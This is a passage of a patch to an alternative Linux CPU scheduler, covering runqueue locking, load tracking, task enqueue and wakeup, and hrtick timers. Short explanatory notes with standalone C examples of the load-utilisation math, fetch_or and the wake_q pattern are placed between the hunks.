-+ * __task_rq_lock - lock the rq @p resides on.
-+ */
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	lockdep_assert_held(&p->pi_lock);
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
-+			return rq;
-+		raw_spin_unlock(&rq->lock);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+/*
-+ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
-+ */
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	for (;;) {
-+		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		/*
-+		 *	move_queued_task()		task_rq_lock()
-+		 *
-+		 *	ACQUIRE (rq->lock)
-+		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
-+		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
-+		 *	[S] ->cpu = new_cpu		[L] task_rq()
-+		 *					[L] ->on_rq
-+		 *	RELEASE (rq->lock)
-+		 *
-+		 * If we observe the old CPU in task_rq_lock(), the acquire of
-+		 * the old rq->lock will fully serialize against the stores.
-+		 *
-+		 * If we observe the new CPU in task_rq_lock(), the address
-+		 * dependency headed by '[L] rq = task_rq()' and the acquire
-+		 * will pair with the WMB to ensure we then also see migrating.
-+		 */
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
-+			return rq;
-+		}
-+		raw_spin_unlock(&rq->lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+static inline void
-+rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irqsave(&rq->lock, rf->flags);
-+}
-+
-+static inline void
-+rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
-+}
-+
-+void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
-+{
-+	raw_spinlock_t *lock;
-+
-+	/* Matches synchronize_rcu() in __sched_core_enable() */
-+	preempt_disable();
-+
-+	for (;;) {
-+		lock = __rq_lockp(rq);
-+		raw_spin_lock_nested(lock, subclass);
-+		if (likely(lock == __rq_lockp(rq))) {
-+			/* preempt_count *MUST* be > 1 */
-+			preempt_enable_no_resched();
-+			return;
-+		}
-+		raw_spin_unlock(lock);
-+	}
-+}
-+
-+void raw_spin_rq_unlock(struct rq *rq)
-+{
-+	raw_spin_unlock(rq_lockp(rq));
-+}
-+
-+/*
-+ * RQ-clock updating methods:
-+ */
-+
-+static void update_rq_clock_task(struct rq *rq, s64 delta)
-+{
-+/*
-+ * In theory, the compiler should just see 0 here, and optimize out the call
-+ * to sched_rt_avg_update. But I don't trust it...
-+ */
-+	s64 __maybe_unused steal = 0, irq_delta = 0;
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
-+
-+	/*
-+	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
-+	 * this case when a previous update_rq_clock() happened inside a
-+	 * {soft,}irq region.
-+	 *
-+	 * When this happens, we stop ->clock_task and only update the
-+	 * prev_irq_time stamp to account for the part that fit, so that a next
-+	 * update will consume the rest. This ensures ->clock_task is
-+	 * monotonic.
-+	 *
-+	 * It does however cause some slight miss-attribution of {soft,}irq
-+	 * time, a more accurate solution would be to update the irq_time using
-+	 * the current rq->clock timestamp, except that would require using
-+	 * atomic ops.
-+	 */
-+	if (irq_delta > delta)
-+		irq_delta = delta;
-+
-+	rq->prev_irq_time += irq_delta;
-+	delta -= irq_delta;
-+	psi_account_irqtime(rq->curr, irq_delta);
-+#endif
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	if (static_key_false((&paravirt_steal_rq_enabled))) {
-+		steal = paravirt_steal_clock(cpu_of(rq));
-+		steal -= rq->prev_steal_time_rq;
-+
-+		if (unlikely(steal > delta))
-+			steal = delta;
-+
-+		rq->prev_steal_time_rq += steal;
-+		delta -= steal;
-+	}
-+#endif
-+
-+	rq->clock_task += delta;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	if ((irq_delta + steal))
-+		update_irq_load_avg(rq, irq_delta + steal);
-+#endif
-+}
-+
-+static inline void update_rq_clock(struct rq *rq)
-+{
-+	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
-+
-+	if (unlikely(delta <= 0))
-+		return;
-+	rq->clock += delta;
-+	update_rq_time_edge(rq);
-+	update_rq_clock_task(rq, delta);
-+}
-+
-+/*
-+ * RQ Load update routine
-+ */
-+#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
-+#define RQ_UTIL_SHIFT			(8)
-+#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
-+
-+#define LOAD_BLOCK(t)		((t) >> 17)
-+#define LOAD_HALF_BLOCK(t)	((t) >> 16)
-+#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
-+#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
-+#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
-+
-+static inline void rq_load_update(struct rq *rq)
-+{
-+	u64 time = rq->clock;
-+	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
-+			RQ_LOAD_HISTORY_BITS - 1);
-+	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
-+	u64 curr = !!rq->nr_running;
-+
-+	if (delta) {
-+		rq->load_history = rq->load_history >> delta;
-+
-+		if (delta < RQ_UTIL_SHIFT) {
-+			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
-+			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
-+				rq->load_history ^= LOAD_BLOCK_BIT(delta);
-+		}
-+
-+		rq->load_block = BLOCK_MASK(time) * prev;
-+	} else {
-+		rq->load_block += (time - rq->load_stamp) * prev;
-+	}
-+	if (prev ^ curr)
-+		rq->load_history ^= CURRENT_LOAD_BIT;
-+	rq->load_stamp = time;
-+}
-+
-+unsigned long rq_load_util(struct rq *rq, unsigned long max)
-+{
-+	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
-+}
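
Put differently, rq_load_update() above maintains a 32-bit sliding window of
busy/idle bits, one bit per 2^17 ns (~131 us) block with bit 31 tracking the
in-progress block, and rq_load_util() scales the eight completed bits below
it into the capacity range. A standalone rendering of the read side:

#include <stdint.h>
#include <stdio.h>

#define HISTORY_BITS	32	/* RQ_LOAD_HISTORY_BITS */
#define UTIL_SHIFT	8	/* RQ_UTIL_SHIFT */

/* Mirror of RQ_LOAD_HISTORY_TO_UTIL(): the 8 bits just below the
 * current-block bit form a 0..255 busyness sample. */
static unsigned int util_from_history(uint32_t history, unsigned int max)
{
	unsigned int sample =
		(history >> (HISTORY_BITS - 1 - UTIL_SHIFT)) & 0xff;

	return sample * (max >> UTIL_SHIFT);
}

int main(void)
{
	printf("%u\n", util_from_history(0xffffffffu, 1024));	/* 1020 */
	printf("%u\n", util_from_history(0x0u, 1024));		/* 0 */
	return 0;
}
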
-+
-+#ifdef CONFIG_SMP
-+unsigned long sched_cpu_util(int cpu)
-+{
-+	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
-+}
-+#endif /* CONFIG_SMP */
-+
-+#ifdef CONFIG_CPU_FREQ
-+/**
-+ * cpufreq_update_util - Take a note about CPU utilization changes.
-+ * @rq: Runqueue to carry out the update for.
-+ * @flags: Update reason flags.
-+ *
-+ * This function is called by the scheduler on the CPU whose utilization is
-+ * being updated.
-+ *
-+ * It can only be called from RCU-sched read-side critical sections.
-+ *
-+ * The way cpufreq is currently arranged requires it to evaluate the CPU
-+ * performance state (frequency/voltage) on a regular basis to prevent it from
-+ * being stuck in a completely inadequate performance level for too long.
-+ * That is not guaranteed to happen if the updates are only triggered from CFS
-+ * and DL, though, because they may not be coming in if only RT tasks are
-+ * active all the time (or there are RT tasks only).
-+ *
-+ * As a workaround for that issue, this function is called periodically by the
-+ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
-+ * but that really is a band-aid.  Going forward it should be replaced with
-+ * solutions targeted more specifically at RT tasks.
-+ */
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+	struct update_util_data *data;
-+
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
-+						  cpu_of(rq)));
-+	if (data)
-+		data->func(data, rq_clock(rq), flags);
-+}
-+#else
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+}
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+/*
-+ * Tick may be needed by tasks in the runqueue depending on their policy and
-+ * requirements. If tick is needed, let's send the target an IPI to kick it out
-+ * of nohz mode if necessary.
-+ */
-+static inline void sched_update_tick_dependency(struct rq *rq)
-+{
-+	int cpu = cpu_of(rq);
-+
-+	if (!tick_nohz_full_cpu(cpu))
-+		return;
-+
-+	if (rq->nr_running < 2)
-+		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
-+	else
-+		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
-+}
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_update_tick_dependency(struct rq *rq) { }
-+#endif
-+
-+bool sched_task_on_rq(struct task_struct *p)
-+{
-+	return task_on_rq_queued(p);
-+}
-+
-+unsigned long get_wchan(struct task_struct *p)
-+{
-+	unsigned long ip = 0;
-+	unsigned int state;
-+
-+	if (!p || p == current)
-+		return 0;
-+
-+	/* Only get wchan if task is blocked and we can keep it that way. */
-+	raw_spin_lock_irq(&p->pi_lock);
-+	state = READ_ONCE(p->__state);
-+	smp_rmb(); /* see try_to_wake_up() */
-+	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
-+		ip = __get_wchan(p);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	return ip;
-+}
-+
-+/*
-+ * Add/Remove/Requeue task to/from the runqueue routines
-+ * Context: rq->lock
-+ */
-+#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	sched_info_dequeue(rq, p);						\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
-+										\
-+	list_del(&p->sq_node);							\
-+	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
-+		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
-+	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
-+									\
-+	p->sq_idx = task_sched_prio_idx(p, rq);				\
-+	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-+	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_DEQUEUE_TASK(p, rq, flags);
-+	--rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (1 == rq->nr_running)
-+		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_preempt_mask(rq);
-+	++rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (2 == rq->nr_running)
-+		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
-+{
-+	lockdep_assert_held(&rq->lock);
-+	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
-+		  cpu_of(rq), task_cpu(p));
-+
-+	list_del(&p->sq_node);
-+	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
-+	if (idx != p->sq_idx) {
-+		if (list_empty(&rq->queue.heads[p->sq_idx]))
-+			clear_bit(sched_idx2prio(p->sq_idx, rq),
-+				  rq->queue.bitmap);
-+		p->sq_idx = idx;
-+		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_preempt_mask(rq);
-+	}
-+}
-+
-+/*
-+ * cmpxchg based fetch_or, macro so it works for different integer types
-+ */
-+#define fetch_or(ptr, mask)						\
-+	({								\
-+		typeof(ptr) _ptr = (ptr);				\
-+		typeof(mask) _mask = (mask);				\
-+		typeof(*_ptr) _val = *_ptr;				\
-+									\
-+		do {							\
-+		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
-+	_val;								\
-+})
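
fetch_or() above is the classic compare-and-swap retry loop that returns the
value the word held before the OR. C11 can express the result directly with
atomic_fetch_or(); the explicit loop form, mirroring the macro, looks like
this in portable userspace code:

#include <stdatomic.h>
#include <stdio.h>

/* Retry until our OR lands, returning the pre-update value. */
static unsigned int fetch_or_demo(_Atomic unsigned int *ptr, unsigned int mask)
{
	unsigned int val = atomic_load(ptr);

	while (!atomic_compare_exchange_weak(ptr, &val, val | mask))
		;	/* a failed CAS reloads val; just retry */
	return val;
}

int main(void)
{
	_Atomic unsigned int flags = 0x1;
	unsigned int old = fetch_or_demo(&flags, 0x4);

	printf("old=%#x new=%#x\n", old, atomic_load(&flags));	/* 0x1, 0x5 */
	return 0;
}
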
-+
-+#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
-+/*
-+ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
-+ * this avoids any races wrt polling state changes and thereby avoids
-+ * spurious IPIs.
-+ */
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
-+}
-+
-+/*
-+ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
-+ *
-+ * If this returns true, then the idle task promises to call
-+ * sched_ttwu_pending() and reschedule soon.
-+ */
-+static bool set_nr_if_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	typeof(ti->flags) val = READ_ONCE(ti->flags);
-+
-+	for (;;) {
-+		if (!(val & _TIF_POLLING_NRFLAG))
-+			return false;
-+		if (val & _TIF_NEED_RESCHED)
-+			return true;
-+		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
-+			break;
-+	}
-+	return true;
-+}
-+
-+#else
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	set_tsk_need_resched(p);
-+	return true;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline bool set_nr_if_polling(struct task_struct *p)
-+{
-+	return false;
-+}
-+#endif
-+#endif
-+
-+static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	struct wake_q_node *node = &task->wake_q;
-+
-+	/*
-+	 * Atomically grab the task, if ->wake_q is !nil already it means
-+	 * it's already queued (either by us or someone else) and will get the
-+	 * wakeup due to that.
-+	 *
-+	 * In order to ensure that a pending wakeup will observe our pending
-+	 * state, even in the failed case, an explicit smp_mb() must be used.
-+	 */
-+	smp_mb__before_atomic();
-+	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
-+		return false;
-+
-+	/*
-+	 * The head is context local, there can be no concurrency.
-+	 */
-+	*head->lastp = node;
-+	head->lastp = &node->next;
-+	return true;
-+}
-+
-+/**
-+ * wake_q_add() - queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ */
-+void wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (__wake_q_add(head, task))
-+		get_task_struct(task);
-+}
-+
-+/**
-+ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ *
-+ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
-+ * that already hold reference to @task can call the 'safe' version and trust
-+ * wake_q to do the right thing depending whether or not the @task is already
-+ * queued for wakeup.
-+ */
-+void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (!__wake_q_add(head, task))
-+		put_task_struct(task);
-+}
-+
-+void wake_up_q(struct wake_q_head *head)
-+{
-+	struct wake_q_node *node = head->first;
-+
-+	while (node != WAKE_Q_TAIL) {
-+		struct task_struct *task;
-+
-+		task = container_of(node, struct task_struct, wake_q);
-+		/* task can safely be re-inserted now: */
-+		node = node->next;
-+		task->wake_q.next = NULL;
-+
-+		/*
-+		 * wake_up_process() executes a full barrier, which pairs with
-+		 * the queueing in wake_q_add() so as not to miss wakeups.
-+		 */
-+		wake_up_process(task);
-+		put_task_struct(task);
-+	}
-+}
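
These three functions support the kernel's usual deferred-wakeup pattern:
collect wakees while holding a lock, then issue the wakeups after dropping
it, so wake_up_process() never runs under the caller's lock. A sketch of the
caller side (the waiter record is hypothetical; DEFINE_WAKE_Q is the stock
helper from <linux/sched/wake_q.h>):

#include <linux/list.h>
#include <linux/sched/wake_q.h>
#include <linux/spinlock.h>

struct demo_waiter {			/* hypothetical waiter record */
	struct list_head	node;
	struct task_struct	*task;
};

static void demo_wake_all(spinlock_t *lock, struct list_head *waiters)
{
	DEFINE_WAKE_Q(wake_q);
	struct demo_waiter *w;

	spin_lock(lock);
	list_for_each_entry(w, waiters, node)
		wake_q_add(&wake_q, w->task);	/* takes a task reference */
	spin_unlock(lock);

	wake_up_q(&wake_q);	/* wakeups and reference drops, lock-free */
}
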
-+
-+/*
-+ * resched_curr - mark rq's current task 'to be rescheduled now'.
-+ *
-+ * On UP this means the setting of the need_resched flag, on SMP it
-+ * might also involve a cross-CPU call to trigger the scheduler on
-+ * the target CPU.
-+ */
-+void resched_curr(struct rq *rq)
-+{
-+	struct task_struct *curr = rq->curr;
-+	int cpu;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	if (test_tsk_need_resched(curr))
-+		return;
-+
-+	cpu = cpu_of(rq);
-+	if (cpu == smp_processor_id()) {
-+		set_tsk_need_resched(curr);
-+		set_preempt_need_resched();
-+		return;
-+	}
-+
-+	if (set_nr_and_not_polling(curr))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+void resched_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (cpu_online(cpu) || cpu == smp_processor_id())
-+		resched_curr(cpu_rq(cpu));
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+}
-+
-+#ifdef CONFIG_SMP
-+#ifdef CONFIG_NO_HZ_COMMON
-+void nohz_balance_enter_idle(int cpu) {}
-+
-+void select_nohz_load_balancer(int stop_tick) {}
-+
-+void set_cpu_sd_state_idle(void) {}
-+
-+/*
-+ * In the semi idle case, use the nearest busy CPU for migrating timers
-+ * from an idle CPU.  This is good for power-savings.
-+ *
-+ * We don't do a similar optimization for a completely idle system, as
-+ * selecting an idle CPU will add more delays to the timers than intended
-+ * (as that CPU's timer base may not be up to date wrt jiffies etc).
-+ */
-+int get_nohz_timer_target(void)
-+{
-+	int i, cpu = smp_processor_id(), default_cpu = -1;
-+	struct cpumask *mask;
-+	const struct cpumask *hk_mask;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
-+		if (!idle_cpu(cpu))
-+			return cpu;
-+		default_cpu = cpu;
-+	}
-+
-+	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
-+
-+	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
-+		for_each_cpu_and(i, mask, hk_mask)
-+			if (!idle_cpu(i))
-+				return i;
-+
-+	if (default_cpu == -1)
-+		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
-+	cpu = default_cpu;
-+
-+	return cpu;
-+}
-+
-+/*
-+ * When add_timer_on() enqueues a timer into the timer wheel of an
-+ * idle CPU then this timer might expire before the next timer event
-+ * which is scheduled to wake up that CPU. In case of a completely
-+ * idle system the next event might even be infinite time into the
-+ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
-+ * leaves the inner idle loop so the newly added timer is taken into
-+ * account when the CPU goes back to idle and evaluates the timer
-+ * wheel for the next timer event.
-+ */
-+static inline void wake_up_idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (cpu == smp_processor_id())
-+		return;
-+
-+	if (set_nr_and_not_polling(rq->idle))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+static inline bool wake_up_full_nohz_cpu(int cpu)
-+{
-+	/*
-+	 * We just need the target to call irq_exit() and re-evaluate
-+	 * the next tick. The nohz full kick at least implies that.
-+	 * If needed we can still optimize that later with an
-+	 * empty IRQ.
-+	 */
-+	if (cpu_is_offline(cpu))
-+		return true;  /* Don't try to wake offline CPUs. */
-+	if (tick_nohz_full_cpu(cpu)) {
-+		if (cpu != smp_processor_id() ||
-+		    tick_nohz_tick_stopped())
-+			tick_nohz_full_kick_cpu(cpu);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_nohz_cpu(int cpu)
-+{
-+	if (!wake_up_full_nohz_cpu(cpu))
-+		wake_up_idle_cpu(cpu);
-+}
-+
-+static void nohz_csd_func(void *info)
-+{
-+	struct rq *rq = info;
-+	int cpu = cpu_of(rq);
-+	unsigned int flags;
-+
-+	/*
-+	 * Release the rq::nohz_csd.
-+	 */
-+	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
-+	WARN_ON(!(flags & NOHZ_KICK_MASK));
-+
-+	rq->idle_balance = idle_cpu(cpu);
-+	if (rq->idle_balance && !need_resched()) {
-+		rq->nohz_idle_balance = flags;
-+		raise_softirq_irqoff(SCHED_SOFTIRQ);
-+	}
-+}
-+
-+#endif /* CONFIG_NO_HZ_COMMON */
-+#endif /* CONFIG_SMP */
-+
-+static inline void check_preempt_curr(struct rq *rq)
-+{
-+	if (sched_rq_first_task(rq) != rq->curr)
-+		resched_curr(rq);
-+}
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+/*
-+ * Use HR-timers to deliver accurate preemption points.
-+ */
-+
-+static void hrtick_clear(struct rq *rq)
-+{
-+	if (hrtimer_active(&rq->hrtick_timer))
-+		hrtimer_cancel(&rq->hrtick_timer);
-+}
-+
-+/*
-+ * High-resolution timer tick.
-+ * Runs from hardirq context with interrupts disabled.
-+ */
-+static enum hrtimer_restart hrtick(struct hrtimer *timer)
-+{
-+	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
-+
-+	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
-+
-+	raw_spin_lock(&rq->lock);
-+	resched_curr(rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	return HRTIMER_NORESTART;
-+}
-+
-+/*
-+ * Use hrtick when:
-+ *  - enabled by features
-+ *  - hrtimer is actually high res
-+ */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	/**
-+	 * Alt schedule FW doesn't support sched_feat yet
-+	if (!sched_feat(HRTICK))
-+		return 0;
-+	*/
-+	if (!cpu_active(cpu_of(rq)))
-+		return 0;
-+	return hrtimer_is_hres_active(&rq->hrtick_timer);
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void __hrtick_restart(struct rq *rq)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	ktime_t time = rq->hrtick_time;
-+
-+	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
-+}
-+
-+/*
-+ * called from hardirq (IPI) context
-+ */
-+static void __hrtick_start(void *arg)
-+{
-+	struct rq *rq = arg;
-+
-+	raw_spin_lock(&rq->lock);
-+	__hrtick_restart(rq);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	s64 delta;
-+
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense and can cause timer DoS.
-+	 */
-+	delta = max_t(s64, delay, 10000LL);
-+
-+	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
-+
-+	if (rq == this_rq())
-+		__hrtick_restart(rq);
-+	else
-+		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
-+}
-+
-+#else
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense. Rely on vruntime for fairness.
-+	 */
-+	delay = max_t(u64, delay, 10000LL);
-+	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
-+		      HRTIMER_MODE_REL_PINNED_HARD);
-+}
-+#endif /* CONFIG_SMP */
-+
-+static void hrtick_rq_init(struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
-+#endif
-+
-+	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
-+	rq->hrtick_timer.function = hrtick;
-+}
-+#else	/* CONFIG_SCHED_HRTICK */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	return 0;
-+}
-+
-+static inline void hrtick_clear(struct rq *rq)
-+{
-+}
-+
-+static inline void hrtick_rq_init(struct rq *rq)
-+{
-+}
-+#endif	/* CONFIG_SCHED_HRTICK */
-+
-+static inline int __normal_prio(int policy, int rt_prio, int static_prio)
-+{
-+	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
-+		static_prio + MAX_PRIORITY_ADJ;
-+}
-+
-+/*
-+ * Calculate the expected normal priority: i.e. priority
-+ * without taking RT-inheritance into account. Might be
-+ * boosted by interactivity modifiers. Changes upon fork,
-+ * setprio syscalls, and whenever the interactivity
-+ * estimator recalculates.
-+ */
-+static inline int normal_prio(struct task_struct *p)
-+{
-+	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
-+}
-+
-+/*
-+ * Calculate the current priority, i.e. the priority
-+ * taken into account by the scheduler. This value might
-+ * be boosted by RT tasks as it will be RT if the task got
-+ * RT-boosted. If not then it returns p->normal_prio.
-+ */
-+static int effective_prio(struct task_struct *p)
-+{
-+	p->normal_prio = normal_prio(p);
-+	/*
-+	 * If we are RT tasks or we were boosted to RT priority,
-+	 * keep the priority unchanged. Otherwise, update priority
-+	 * to the normal priority:
-+	 */
-+	if (!rt_prio(p->prio))
-+		return p->normal_prio;
-+	return p->prio;
-+}
-+
-+/*
-+ * activate_task - move a task to the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static void activate_task(struct task_struct *p, struct rq *rq)
-+{
-+	enqueue_task(p, rq, ENQUEUE_WAKEUP);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+
-+	/*
-+	 * If in_iowait is set, the code below may not trigger any cpufreq
-+	 * utilization updates, so do it here explicitly with the IOWAIT flag
-+	 * passed.
-+	 */
-+	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
-+}
-+
-+/*
